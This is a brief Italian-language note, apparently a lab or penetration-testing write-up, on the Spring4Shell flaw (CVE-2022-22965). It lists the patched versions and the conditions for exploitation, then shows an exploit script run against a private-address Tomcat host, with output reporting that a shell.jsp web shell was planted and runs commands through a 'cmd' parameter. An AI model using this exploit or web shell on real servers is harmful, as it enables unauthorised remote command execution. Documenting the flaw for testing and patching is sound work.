
Spring4Shell
Spring Framework 5.3.18 e 5.2.20
Spring Boot 2.6.6 e 2.5.12
Spring Core è il componente principale di Spring Framework. Questa è la base per costruire altri componenti nell'ecosistema Spring Framework come Spring MVC, Spring Boot, Spring WebFlux. Il codice exploit è eseguibile alle seguenti condizioni:
JDK 9 o superiore
Apache Tomcat esegue contenitori servlet
Packaging WAR
Dipendenze dei pacchetti: spring-webmvc o spring-webflux
Se l'applicazione viene distribuita come file jar eseguibile di Spring Boot, come avviene per impostazione predefinita, non sarà interessata da questa vulnerabilità di sicurezza.
python CVE-2022-22965.py --url http://172.16.1.10:8080/helloworld/greeting
└─$ python cve-spring4shell.py --url http://172.16.1.10:8080/helloworld/greeting
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://172.16.1.10:8080/shell.jsp?cmd=id